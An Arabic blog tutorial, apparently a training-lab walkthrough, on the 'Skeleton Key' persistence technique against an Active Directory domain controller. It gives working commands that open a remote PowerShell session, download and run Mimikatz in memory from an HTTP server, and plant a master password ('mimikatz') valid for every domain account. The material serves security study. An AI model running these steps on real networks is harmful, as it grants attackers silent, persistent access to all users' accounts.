Persistence - Skeleton Key
السلام عليكم ورحمة الله وبركاته
الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
مقدمة:
في المقالة هذي راح اشرح التكنيك الثالث لتثبيت الاختراق على ال Domain Controller
ايش هو تكنيك Skeleton Key؟
فكرة هذا التكنيك انه يتم تحويل جميع كلمات المرور الخاصة بجميع المتسخدمين المضمنين في ال Active Directory الى باسورد اخر اللي وهو mimikatz مع بقاء فعالية الباسورد السابق الخاص فيهم
الشرح:
طبعا عشان نطبق التكنيك لازم نشغل جلسة PowerShell بمستخدم ضمن قروب Domain Admins
اول شي راح ندخل لجهاز Domain Controller عن طريق هذا الامر:
Enter-PSSession -ComputerName dcorp-dc
بعد كذا راح نسوي تشغيل الى http server على نفس المسار اللي موجودة فيه Mimikatz
الان راح اسوي Load ل اداة Mimikatz عن طريق هذا الامر:
iex (iwr http://172.16.100.7/Invoke-Mimikatz.ps1 -UseBasicParsing)
بعد كذا ننفذ هذا الامر:
Invoke-Mimikatz -Command '"misc::skeleton"'
الان تم اضافة باسورد الى كل مستخدم واللي هو mimikatz مع ضمان فعالية الباسورد السابق الخاص فيهم
الان خلونا نشوف اي مستخدم اخر مثلا يكون موجود في قروب Domain Admins مثلا المتسخدم svcadmin هل نقدر ندخل على جلسة PowerShell خاصه فيه عن طريق الباسورد mimikatz او لا
قدرنا نشغل جلسة PowerShell بصلاحية المستخدم svcadmin ونقدر ايضا ب اي مستخدم مضمن في ال Active Directory
وصلنا الى نهاية المقالة
شاكر لكم.
التعليقات (0)
لايوجد لديك حساب في عالم البرمجة؟
تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !